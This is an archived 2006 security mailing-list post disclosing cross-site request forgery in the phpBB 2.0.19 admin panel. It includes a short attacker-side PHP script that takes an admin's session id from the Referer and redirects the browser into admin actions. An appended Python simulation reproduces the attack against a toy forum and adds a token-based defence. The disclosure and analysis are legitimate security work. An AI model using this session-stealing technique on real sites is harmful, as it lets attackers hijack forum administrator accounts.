Open Source and information security mailing list archives
Date: Fri Feb 3 14:29:13 2006
From: max at jestsuper.pl (Maksymilian Arciemowicz)
Subject: phpBB 2.0.19 Cross Site Request Forgeries and XSS Admin

> From: Berliner <berliner.does.not.mean.jelly.donut_at_googlemail.com>
> 1. Basically all phpBB admin-side options do allow full HTML, including
> javascript. That is the intended behaviour, as there are legitimate uses.
>
> phpBB does however check the Session ID before allowing the changes to go to
> the database.
> Your exploit needs a valid admin session key and you need to get the admin
> to visit the page (unless you happen to have a lot of luck with your IP) - be
> it by a link or a reflecting page. And even then, it will only work when
> the admin has logged into the ACP prior to running into the trap.

    // Attacker-side script: pull the sid out of the Referer the admin's
    // browser sends and bounce the browser to the ACP operation with it.
    // $operation holds the ACP URL to execute.
    $sid = '';
    preg_match('#sid\=?([0-9a-z]*)#i', getenv('HTTP_REFERER'), $sid);
    if ($sid[1] != '') {
        header("Location: " . $operation . "&sid=" . $sid[1]);
    }

If you have, for example, <IMG SRC="http://SOME.SCRIPT.PHP"> and you send the referer... (tested in IE, Mozilla, etc.), then please check getenv('HTTP_REFERER').

The phpBB team was informed about these issues and they confirmed that these vulnerabilities exist in phpBB 2.0.19. The solution is to use POST for all operations.

> 2. That is a general problem with all pages allowing off-site pictures. It
> has been discussed on the list before. Most of your examples won't work with
> phpBB, due to the missing Session ID in the links.

--
pub  1024D/7FDF4CEE 2005-09-21
uid  Maksymilian Arciemowicz (cXIb8O3) <max@...tsuper.pl>
sub  2048g/AE816DB6 2005-09-21
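The exchange above hinges on one detail: phpBB 2 carries the session id in the URL, so any page the admin views with that URL sends the sid to third-party image hosts in the Referer header, and the attacker's script can hand it straight back in a redirect. The following is an added example, not code from the message or from phpBB: it reproduces the posted regex in Python, models the ACP's sid check with a toy `Forum` class, runs the Referer-to-redirect chain against it, and then adds a per-session secret that is sent only in the POST body (the hardened variant is this example's own addition; hostnames, URLs and the `Forum` model are all constructed).

```python
import re
import secrets
from typing import Optional
from urllib.parse import urlsplit, parse_qs

# Same expression as the PHP snippet in the message:
#   preg_match('#sid\=?([0-9a-z]*)#i', getenv('HTTP_REFERER'), $sid)
# It captures whatever follows the first "sid" (optionally "sid=") anywhere in
# the Referer, case-insensitively; no hostname or parameter-name check at all.
SID_RE = re.compile(r"sid=?([0-9a-z]*)", re.IGNORECASE)


def extract_sid(referer: Optional[str]) -> str:
    """Session id leaked through the Referer URL, or '' if there is none."""
    m = SID_RE.search(referer or "")
    return m.group(1) if m else ""


def attacker_redirect(operation: str, referer: Optional[str]) -> Optional[str]:
    """Location header the image script emits: the ACP action plus the stolen sid."""
    sid = extract_sid(referer)
    return f"{operation}&sid={sid}" if sid else None


class Forum:
    """Toy stand-in for the ACP (constructed): sid-in-URL sessions, optional token."""

    def __init__(self, require_token: bool = False) -> None:
        self.require_token = require_token
        self.sessions = {}                  # sid -> (username, csrf_token)
        self.admins = {"admin"}
        self.config = {"sitename": "My forum"}

    def login(self, user: str) -> str:
        sid = secrets.token_hex(16)         # 32 lowercase hex chars, like phpBB2's sid
        self.sessions[sid] = (user, secrets.token_hex(16))
        return sid

    def token_for(self, sid: str) -> str:
        return self.sessions[sid][1]

    def admin_request(self, method: str, url: str, form: Optional[dict] = None) -> bool:
        """Apply a config change if the request is authorised; True when it changed."""
        query = {k: v[0] for k, v in parse_qs(urlsplit(url).query).items()}
        session = self.sessions.get(query.get("sid", ""))
        if session is None or session[0] not in self.admins:
            return False                    # the sid check Berliner describes
        params = (form or {}) if method == "POST" else query
        if self.require_token and params.get("token") != session[1]:
            return False                    # hardened: secret lives only in the body
        if "sitename" in params:
            self.config["sitename"] = params["sitename"]
            return True
        return False


def run_attack(forum: Forum, admin_sid: str) -> bool:
    """Admin, logged in, views a forum page that embeds the attacker's <img>."""
    # The page the admin is on carries the sid in its URL, so the browser sends
    # that URL as the Referer of the image request (constructed URL).
    referer = f"http://forum.example/viewtopic.php?t=1&sid={admin_sid}"
    operation = "http://forum.example/admin/admin_board.php?submit=1&sitename=pwned"
    location = attacker_redirect(operation, referer)
    if location is None:
        return False
    # The browser follows the 302 as an ordinary GET, sid and all.
    return forum.admin_request("GET", location)


if __name__ == "__main__":
    weak, hard = Forum(), Forum(require_token=True)
    print("sid-only check, <img> chain succeeds:", run_attack(weak, weak.login("admin")))
    print("token in POST body, <img> chain succeeds:", run_attack(hard, hard.login("admin")))
```

Switching every ACP action to POST does kill the plain `<img>` vector, since an image request is always a GET. It does not by itself stop a cross-site form that a script auto-submits, because the sid is still in the URL and still leaks through the Referer; what the attacker cannot reproduce is a value that never appears in any URL, which is what the `require_token` branch models.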